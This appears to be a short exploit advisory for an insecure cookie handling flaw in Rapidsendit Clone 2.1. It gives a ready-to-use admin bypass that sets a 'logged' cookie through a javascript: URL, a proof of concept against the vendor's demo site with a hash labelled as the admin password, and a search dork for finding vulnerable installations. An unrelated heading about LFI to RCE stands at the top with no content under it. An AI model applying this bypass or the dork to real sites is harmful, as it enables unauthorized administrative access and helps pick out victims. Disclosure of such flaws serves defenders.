LFI to RCE via access_log injection

Rapidsendit Clone 2.1 Insecure Cookie Handling Vuln


[o] Rapidsendit Clone 2.1 Insecure Cookie Handling Vulnerability
Software : Rapidsendit Clone version 2.1
Vendor : http://www.rapidsendit.com/
Demo : http://www.rapidsendit.com/script/demo.html
Author : NoGe



[o] Vulnerable file
admin.php


[o] Exploit
http://localhost/[path]/admin.php
javascript:document.cookie="logged=[md5_password_hash]; path=/";


[o] Proof Of Concept
http://www.rapidsendit.com/script/demo/admin.php
replace url above with this javascript
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
696d29e0940a4957748fe3fc9efd22a3 = admin password


[o] Dork
"Powered By Rapidsendit Clone"


Comments